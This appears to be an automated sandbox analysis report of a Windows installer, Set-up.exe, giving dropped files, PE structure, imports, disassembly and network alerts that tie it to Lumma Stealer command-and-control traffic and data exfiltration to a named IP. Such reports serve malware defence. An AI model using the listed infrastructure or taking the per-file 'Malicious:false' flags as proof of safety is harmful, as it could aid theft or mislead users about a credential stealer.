                                                                  Preview:W..Q....)5t...1^..#....*.#<...;H0_......6..?H..2.s........A?7.,n.])W..tS.......V..P."..1(....zlE._.:..~M,......3.a...L.\.....]c....iMN..{g.](,g........%..`.E.]c..6.o...........m.SJ..,.e.<.w....U..g+.l....,>.A_....!..{.=b%>...V.'.&A..E...W'...|.R.x4...".....rQ.6.S.|#.:.l#.g......t..9.}.f'.).>v.;.O...o..@..G...t...3.w.Fl..C....\....8{..p.p:.)..3......8.<......X.t.F[.*...M....of.U...j...c.B~.3F...bm.s.?I....z!,.p..~...k0eV....W.m..(.,.........q.5....B|.:..Y.....G....(..VG.@.<{2P.Y|=.....BD>.b.._g.."q.......aU'3.Z.U5..3*.x....J..h.Mn..Q...{...\..T.1...F.\....^a...y....n.+....iH=.....?.iL.W....R*XV".ZOMi.......h...&.r......]m.&..bUN.zoky...d@kh.1..$.l...B.Ku.}...K..^K..3....A(J><.vq.....8l .FJ.Os .c.D..y`.lL...6T.0..U..q.../.z.?..w.i=.es..W.7....O...ka2..J..h.3.[.e=k.i.....a.+..8=.o...P)......q...o).g.W.<..VO{......A.T.>.B@...".2>.w...@2.......!.HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Mb...l.t.jxI.

                                                                  C:\Users\user\AppData\Local\Temp\Solo

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\Set-up.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):12280
                                                                  Entropy (8bit):7.457856038940291
                                                                  Encrypted:false
                                                                  SSDEEP:192:Pq9nyqsxvhLuBgfMvSVZPkZeCeAH6N8VEVFJ84kcGNq4/C+Q3ISVSWMZMQ3rw:PeZGhLdXVaeCVrVEVFJ8ZcGwGBk7/UMJ
                                                                  MD5:82E7B3935ED2B1D3BE9F3A142AE93D7B
                                                                  SHA1:B71F1B59210F999EC3A1B677F71ECFF884B18C4E
                                                                  SHA-256:C15931C8D1C4AA873B55F66BF7B754F734BCC5D6CCE88E5426004806CA4F839C
                                                                  SHA-512:3316FBDDA080495862DA23A77A31E0D8042A2F9A37CCC91E7355F5E97FB11514E552FA50F6538ACA1CE85A6CFB83622E954696F99DEB924140ACBA8C7D81EFFF
                                                                  Malicious:false
                                                                  Preview:.9.9.9.9.9.9.:.:.:.:$:,:4:<:D:L:T:\:d:l:t:|:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.;.;.;.;$;,;4;<;D;L;T;\;d;l;t;|;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.<.<.<.<$<,<4<<<D<L<T<\<d<l<t<|<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.=.=.=.=$=,=4=<=D=L=T=\=d=l=t=|=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.>.>.>.>$>,>4><>.P......@8H8P8X8`8h8p8x8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.9.9.9.9 9(90989@9H9P9X9`9h9p9x9.9.9.9.9.9.9.9.9.9.9.9.9.9.9.9.9.:.:.:.: :(:0:8:@:H:P:X:`:h:p:x:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.;.;.;.; ;(;0;8;@;H;P;X;`;h;p;x;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.<.<.<.< <(<0<8<@<H<P<X<`<h<p<x<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.=.=.=.= =(=0=8=@=H=P=X=`=h=p=x=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.>.>.>.> >(>0>8>@>H>P>X>`>h>p>x>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.?.?.?.? ?(?0?8?@?H?P?X?........$3@3D3.3.3.3. .......0(0.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.2.2.2.2.2.2.2.2 2$2(2,2024282<2@2D2H2L2P2T2X2\2`2d2h2l2p2t2x2|2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.2.3.3.3.3.3.3.3.3 3$3(3,3034383@3D3H3L3P3T3X3\3`3d3h3

                                                                  C:\Users\user\AppData\Local\Temp\Trying

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\Set-up.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):124928
                                                                  Entropy (8bit):5.725751492257859
                                                                  Encrypted:false
                                                                  SSDEEP:1536:ZHsWccd0vtmgMbFuz08QuklMBNIimuzaAwusPM:ZLeAg0Fuz08XvBNbjaAtsPM
                                                                  MD5:D56E62CAFA746423317B9FCD3D01AF2F
                                                                  SHA1:6EC4122493F4035B8524A159F383B53CFB350E53
                                                                  SHA-256:1034C5641AFF708BC02EAD6A4EC058235550108F1E33723BCACF4CCB45C677CC
                                                                  SHA-512:8FED2B1CB42C91BE6A1518219123380EDB3ECC0A1F8CFE9B97F69E531BB5912163AC0B99F4D84F5EBF1FAE5B115D988FCA04DEACB8D11314AE7E9EA1A61C519D
                                                                  Malicious:false
                                                                  Preview:................................................ !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~.................................................................................................................................INF.inf.NAN.nan.NAN(SNAN)...nan(snan)...NAN(IND)....nan(ind)....e+000...tanh....asin....acos....atan....atan2...sqrt....sin.cos.tan.ceil....floor...fabs....modf....ldexp..._cabs..._hypot..fmod....frexp..._y0._y1._yn._logb..._nextafter..........H=J.....L=J.....P=J.....T=J.....\=J.....d=J.!....;J......;J......;J......;J......;J......;J......;J......;J. ....;J......;J......;J......<J......<J......<J......<J.....$<J.....,<J.....4<J."...<<J.#...@<J.$...D<J.%...H<J.&...P<J.exp.pow.log.log10...sinh....cosh.........................................D...........0........8C......8C.......................?.......?................1g....U?.....k.?wN.o...?......?.9..B..?...........@G...................................................

                                                                  C:\Users\user\AppData\Local\Temp\Unified

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\Set-up.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):76800
                                                                  Entropy (8bit):7.997593893200213
                                                                  Encrypted:true
                                                                  SSDEEP:1536:YwXeMN8yVDMz4UFkzGFGRQoAWF60ftgsrhJfohf6H+aRA2fUDrYLqjl:peMN8ypzA3oAWVySe0e72fQrp
                                                                  MD5:5AB8C7A0C0E7CF0D77B399C101BA2026
                                                                  SHA1:CC0FCF1C255CA659377259DB3AE0B9AAC2A92E0E
                                                                  SHA-256:E6F3F5769B69871336057F20A85AC8DFC136805248CD44235C4CF9DE479671FA
                                                                  SHA-512:E7065062146123C867EE1B543BE493A5DE3B6F007580C8F092BAC32E7718EF6B7F6ECFABF979C509EFC6D899DA1CF0CF089A4E464CC87AAEB7ECFBFCDB32220A
                                                                  Malicious:false
                                                                  Preview:...Z...........@...3.......^....Dp..T...|.$.....i.Y.......cs.~R.j..y.0[^?;....a..S...~..}.4.k.s.....j.6...>....g.$j.2.o{.hI..[h[.\.G.....Un..Z..D..R ....(.3......q...w.{.].)l..R[.>J...Te'.G....U...D.px..F......?.;...O.Wt..ul.lw..5.B...1.,f..67.G.P..F..Hl./Q...../..`...XBS...................7......_.5.W*U.w..R=........?.{..M.I....tK........E..=.[.....l.3..r...*...M\.s^).\@.k@^~..R........7.....p.~...._.TEkA.."..zp...8..u......:j.`?N......P..0..|V....y..*h.-Q....Ci...?8.G..@...v.{.*L..O...Rj.....6..A..........v...J...@P.... ...O}..=..N>..{....(.9a.r21....h.hd.......h..0.5......C.+...uL.....J6.L...Cf..T.o.&...E.V...a.w......*..q8..p....~j.."{.y./...Q,...y........{.../...<3:n..{....o.2..N.>.....^8z.G..J...P....K`V......l.<...{.;..&..m{1..(.R...r&r..9....,..%.U.M..3...,.O..P...y2..J..>.t.T....N]t.y...y...aTx..H.O...]....(.~........'...0......X.....M.-c..8c...u.N...iT..wJ..,...wc..6..f......=.C..h...5.N.3.U&.1J.......w.d. ....$. .

                                                                  C:\Users\user\AppData\Local\Temp\Ups

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\Set-up.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):51200
                                                                  Entropy (8bit):7.996612313100959
                                                                  Encrypted:true
                                                                  SSDEEP:768:wFcF5lctmyO4lE7J0fgaNbx1R0EMtlrcfHrL+iu4ScBPXfLxZGhJUjAdP7kkcnAE:w2kmyO4lE74gahx1uEErsO+tfd2B4kcd
                                                                  MD5:9CACF2E1C1E1AD31A970206506949845
                                                                  SHA1:01EB101E5B988BFBEE29C82C5971A2E297C260C3
                                                                  SHA-256:71345927F49C5B530DE45F306BBE09F57243C5052847E582F48E57F59099B456
                                                                  SHA-512:7618D451311791CB1BDA70A25C43D64DED77FB4D8CAE9C49C0B9A72A98C4D3BD172A03E2B7C6004F64C21D98C1FDBAE459A0B7AD1B298613688E7099F41AAF03
                                                                  Malicious:false
                                                                  Preview:u...4>.d.....S..{V....!.FCdE.'&"O.p>&[.s..# .r..$.y.......Q.......B3...#O.i2......y*_.S....D.?J...!..).-..T.....6L2#.....6|..N.P..Hr...l.,..fr2.M.y....{....+Rep.?....-.....a.f..%..3..m......3.......Dw.d* .p..TV.kz.|......8..C.h.mw.....XK<.m9....<.3).Y.....2!\l.....7..)J._.....Y.a#.....3..N....,r%..*;.O.MQ_.~zD..ml.. ..GW.;..U.%..nE...u...h.......J..C.....m..y...<.Cr....*..-qfiA>."^f....d..%.....z}7.|..Pb..A..g...'...n.v..z..E..9.y..|I.....K(F.y..m...}R....X_.._..*..yo..d..w.b....i...2../..Y..8...y..S`V.7.N..].E......<A..).f!.{.$..o.(W..B.o..........<...a.F<cgw!..h.+R+....#Mn..r^.F..*...J...Q1.H.F.......h..;v.!..!N..G*....k.!..}.J.....s.r.9..u..G,..LQ..[.P..+x......~*.$...-&.N..t#.z7T.f..6..C....$3..@.*.i..f=i.>..3...dr..'..8.>_.. ^cS..PG.....`.2.`t..v...X....:.:.h..~.?.r..@.......<..k......t.I......k........F.K..B..;.Ah.!........pH;4.....sd>.B...x7..R.m.d.}d....e..b.7..b!M\.!....e.jJ......r....:.;...v32x.w..A...4&.@b.c...q...........]...U.

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ennrtiih.qly.psm1

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_taz4uos2.j2j.ps1

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  Static File Info

                                                                  General

                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                  Entropy (8bit):4.433850851773078
                                                                  TrID:
                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                  File name:Set-up.exe
                                                                  File size:73'408'260 bytes
                                                                  MD5:55688fd8190f43db9f123f682bdd5181
                                                                  SHA1:1279fc04f8b312c41c2e5fb00ebc405c297bb381
                                                                  SHA256:02ad626bde649a1fccd40a8a4951efd92c127db92c4dd11abcbc0b571d096150
                                                                  SHA512:eb96ff307bebce103888aa38e7c2813f269158329a924bb35fd328acd67b2592528cbfdf01b027428edb290ad19190e7a27f5a83a2dfd240e59135f7b18f8149
                                                                  SSDEEP:24576:G8LO97ADUaZosVQIAFcEjq94xJuiW2HvFHwddLFkRx3psj:baqDQsavFcv942iWcUdLFkrZsj
                                                                  TLSH:8BF72334B3B8B1D0E22125829C5795F23CB7AE518309DBDA62DC210DE1C9A1D96FF397
                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t.......B...8.....

                                                                  File Icon

                                                                  Icon Hash:ccdce8c4d49ed4e4

                                                                  Static PE Info

                                                                  General

                                                                  Entrypoint:0x4038af
                                                                  Entrypoint Section:.text
                                                                  Digitally signed:true
                                                                  Imagebase:0x400000
                                                                  Subsystem:windows gui
                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                  Time Stamp:0x4F47E2E4 [Fri Feb 24 19:20:04 2012 UTC]
                                                                  TLS Callbacks:
                                                                  CLR (.Net) Version:
                                                                  OS Version Major:5
                                                                  OS Version Minor:0
                                                                  File Version Major:5
                                                                  File Version Minor:0
                                                                  Subsystem Version Major:5
                                                                  Subsystem Version Minor:0
                                                                  Import Hash:be41bf7b8cc010b614bd36bbca606973

                                                                  Authenticode Signature

                                                                  Signature Valid:false
                                                                  Signature Issuer:CN=DigiCert EV Code Signing CA (SHA2), OU=www.digicert.com, O=DigiCert Inc, C=US
                                                                  Signature Validation Error:The digital signature of the object did not verify
                                                                  Error Number:-2146869232
                                                                  Not Before, Not After
                                                                  • 02/02/2021 00:00:00 06/02/2022 23:59:59
                                                                  Subject Chain
                                                                  • CN=Kryptotel FZ-LLC, O=Kryptotel FZ-LLC, L=Dubai, C=AE, SERIALNUMBER=17805, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.2=Dubai, OID.1.3.6.1.4.1.311.60.2.1.3=AE
                                                                  Version:3
                                                                  Thumbprint MD5:EDBF6A7F5C5815E14E4F7B3733618DB1
                                                                  Thumbprint SHA-1:8EA890F9D0A72FAE54FD5C745426C638F478B8AA
                                                                  Thumbprint SHA-256:2F18EF0DB35F7A93022BE3F0F3A433B640445E233273C8F3BB1130D691EE3A45
                                                                  Serial:03EC8EB325C4692D4082A37C344B45CB

                                                                  Entrypoint Preview

                                                                  Instruction
                                                                  sub esp, 000002D4h
                                                                  push ebx
                                                                  push ebp
                                                                  push esi
                                                                  push edi
                                                                  push 00000020h
                                                                  xor ebp, ebp
                                                                  pop esi
                                                                  mov dword ptr [esp+18h], ebp
                                                                  mov dword ptr [esp+10h], 0040A268h
                                                                  mov dword ptr [esp+14h], ebp
                                                                  call dword ptr [00409030h]
                                                                  push 00008001h
                                                                  call dword ptr [004090B4h]
                                                                  push ebp
                                                                  call dword ptr [004092C0h]
                                                                  push 00000008h
                                                                  mov dword ptr [0047EB98h], eax
                                                                  call 00007FE2C4844C7Bh
                                                                  push ebp
                                                                  push 000002B4h
                                                                  mov dword ptr [0047EAB0h], eax
                                                                  lea eax, dword ptr [esp+38h]
                                                                  push eax
                                                                  push ebp
                                                                  push 0040A264h
                                                                  call dword ptr [00409184h]
                                                                  push 0040A24Ch
                                                                  push 00476AA0h
                                                                  call 00007FE2C484495Dh
                                                                  call dword ptr [004090B0h]
                                                                  push eax
                                                                  mov edi, 004CF0A0h
                                                                  push edi
                                                                  call 00007FE2C484494Bh
                                                                  push ebp
                                                                  call dword ptr [00409134h]
                                                                  cmp word ptr [004CF0A0h], 0022h
                                                                  mov dword ptr [0047EAB8h], eax
                                                                  mov eax, edi
                                                                  jne 00007FE2C484224Ah
                                                                  push 00000022h
                                                                  pop esi
                                                                  mov eax, 004CF0A2h
                                                                  push esi
                                                                  push eax
                                                                  call 00007FE2C4844621h
                                                                  push eax
                                                                  call dword ptr [00409260h]
                                                                  mov esi, eax
                                                                  mov dword ptr [esp+1Ch], esi
                                                                  jmp 00007FE2C48422D3h
                                                                  push 00000020h
                                                                  pop ebx
                                                                  cmp ax, bx
                                                                  jne 00007FE2C484224Ah
                                                                  add esi, 02h
                                                                  cmp word ptr [esi], bx

                                                                  Rich Headers

                                                                  Programming Language:
                                                                  • [ C ] VS2008 SP1 build 30729
                                                                  • [IMP] VS2008 SP1 build 30729
                                                                  • [ C ] VS2010 SP1 build 40219
                                                                  • [RES] VS2010 SP1 build 40219
                                                                  • [LNK] VS2010 SP1 build 40219

                                                                  Data Directories

                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0xac400xb4.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x1000000x48896.rsrc
                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x46000140x1ef0
                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x860000x994.ndata
                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x90000x2d0.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                  Sections

                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                  .text0x10000x728c0x7400419d4e1be1ac35a5db9c47f553b27ceaFalse0.6566540948275862data6.499708590628113IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                  .rdata0x90000x2b6e0x2c00cca1ca3fbf99570f6de9b43ce767f368False0.3678977272727273data4.497932535153822IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                  .data0xc0000x72b9c0x20077f0839f8ebea31040e462523e1c770eFalse0.279296875data1.8049406284608531IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                  .ndata0x7f0000x810000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                  .rsrc0x1000000x488960x48a00f1422f4c5a177382624013df41afe668False0.9761053141135972data7.927069197634443IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                  .reloc0x1490000xfd60x1000457a7fa9a9b207febc43b996e1dbecadFalse0.59814453125data5.591741772523133IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                  Resources

                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                  RT_ICON0x1002200x3f3d2PNG image data, 512 x 512, 8-bit/color RGBA, non-interlacedEnglishUnited States0.995004362496429
                                                                  RT_ICON0x13f5f40x44acPNG image data, 128 x 128, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9970420932878271
                                                                  RT_ICON0x143aa00x21fbPNG image data, 64 x 64, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0012645131624325
                                                                  RT_ICON0x145c9c0x2668Device independent bitmap graphic, 48 x 96 x 32, image size 9792EnglishUnited States0.5479048006509357
                                                                  RT_DIALOG0x1483040x100dataEnglishUnited States0.5234375
                                                                  RT_DIALOG0x1484040x11cdataEnglishUnited States0.6056338028169014
                                                                  RT_DIALOG0x1485200x60dataEnglishUnited States0.7291666666666666
                                                                  RT_GROUP_ICON0x1485800x3edataEnglishUnited States0.8548387096774194
                                                                  RT_MANIFEST0x1485c00x2d6XML 1.0 document, ASCII text, with very long lines (726), with no line terminatorsEnglishUnited States0.5647382920110193

                                                                  Imports

                                                                  DLLImport
                                                                  KERNEL32.dllSetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
                                                                  USER32.dllGetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
                                                                  GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
                                                                  SHELL32.dllSHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
                                                                  ADVAPI32.dllRegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
                                                                  COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                  ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                                                                  VERSION.dllGetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW

                                                                  Possible Origin

                                                                  Language of compilation systemCountry where language is spokenMap
                                                                  EnglishUnited States

                                                                  Network Behavior

                                                                  Suricata IDS Alerts

                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                  2024-12-20T18:17:37.250644+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449735172.67.202.229443TCP
                                                                  2024-12-20T18:17:38.018157+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449735172.67.202.229443TCP
                                                                  2024-12-20T18:17:38.018157+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449735172.67.202.229443TCP
                                                                  2024-12-20T18:17:39.242908+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449737172.67.202.229443TCP
                                                                  2024-12-20T18:17:41.045751+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449737172.67.202.229443TCP
                                                                  2024-12-20T18:17:41.045751+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449737172.67.202.229443TCP
                                                                  2024-12-20T18:17:42.474097+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449739172.67.202.229443TCP
                                                                  2024-12-20T18:17:44.714852+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449740172.67.202.229443TCP
                                                                  2024-12-20T18:17:46.850848+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449741172.67.202.229443TCP
                                                                  2024-12-20T18:17:49.151089+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449742172.67.202.229443TCP
                                                                  2024-12-20T18:17:51.191259+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449743172.67.202.229443TCP
                                                                  2024-12-20T18:17:52.012867+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449743172.67.202.229443TCP
                                                                  2024-12-20T18:17:53.238786+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449744172.67.202.229443TCP
                                                                  2024-12-20T18:17:54.023124+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449744172.67.202.229443TCP
                                                                  2024-12-20T18:17:55.713159+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449745104.21.84.113443TCP

                                                                  Network Port Distribution

                                                                  TCP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Dec 20, 2024 18:17:36.024265051 CET49735443192.168.2.4172.67.202.229
                                                                  Dec 20, 2024 18:17:36.024305105 CET44349735172.67.202.229192.168.2.4
                                                                  Dec 20, 2024 18:17:36.024369001 CET49735443192.168.2.4172.67.202.229
                                                                  Dec 20, 2024 18:17:36.027246952 CET49735443192.168.2.4172.67.202.229
                                                                  Dec 20, 2024 18:17:36.027259111 CET44349735172.67.202.229192.168.2.4
                                                                  Dec 20, 2024 18:17:37.250579119 CET44349735172.67.202.229192.168.2.4
                                                                  Dec 20, 2024 18:17:37.250643969 CET49735443192.168.2.4172.67.202.229
                                                                  Dec 20, 2024 18:17:37.254709005 CET49735443192.168.2.4172.67.202.229
                                                                  Dec 20, 2024 18:17:37.254719019 CET44349735172.67.202.229192.168.2.4
                                                                  Dec 20, 2024 18:17:37.254987001 CET44349735172.67.202.229192.168.2.4
                                                                  Dec 20, 2024 18:17:37.303536892 CET49735443192.168.2.4172.67.202.229
                                                                  Dec 20, 2024 18:17:37.310462952 CET49735443192.168.2.4172.67.202.229
                                                                  Dec 20, 2024 18:17:37.310487986 CET49735443192.168.2.4172.67.202.229
                                                                  Dec 20, 2024 18:17:37.310595989 CET44349735172.67.202.229192.168.2.4
                                                                  Dec 20, 2024 18:17:38.018148899 CET44349735172.67.202.229192.168.2.4
                                                                  Dec 20, 2024 18:17:38.018258095 CET44349735172.67.202.229192.168.2.4
                                                                  Dec 20, 2024 18:17:38.018342018 CET49735443192.168.2.4172.67.202.229
                                                                  Dec 20, 2024 18:17:38.019915104 CET49735443192.168.2.4172.67.202.229
                                                                  Dec 20, 2024 18:17:38.019932032 CET44349735172.67.202.229192.168.2.4
                                                                  Dec 20, 2024 18:17:38.019941092 CET49735443192.168.2.4172.67.202.229
                                                                  Dec 20, 2024 18:17:38.019946098 CET44349735172.67.202.229192.168.2.4
                                                                  Dec 20, 2024 18:17:38.026287079 CET49737443192.168.2.4172.67.202.229
                                                                  Dec 20, 2024 18:17:38.026386023 CET44349737172.67.202.229192.168.2.4
                                                                  Dec 20, 2024 18:17:38.026468992 CET49737443192.168.2.4172.67.202.229
                                                                  Dec 20, 2024 18:17:38.026751995 CET49737443192.168.2.4172.67.202.229
                                                                  Dec 20, 2024 18:17:38.026789904 CET44349737172.67.202.229192.168.2.4
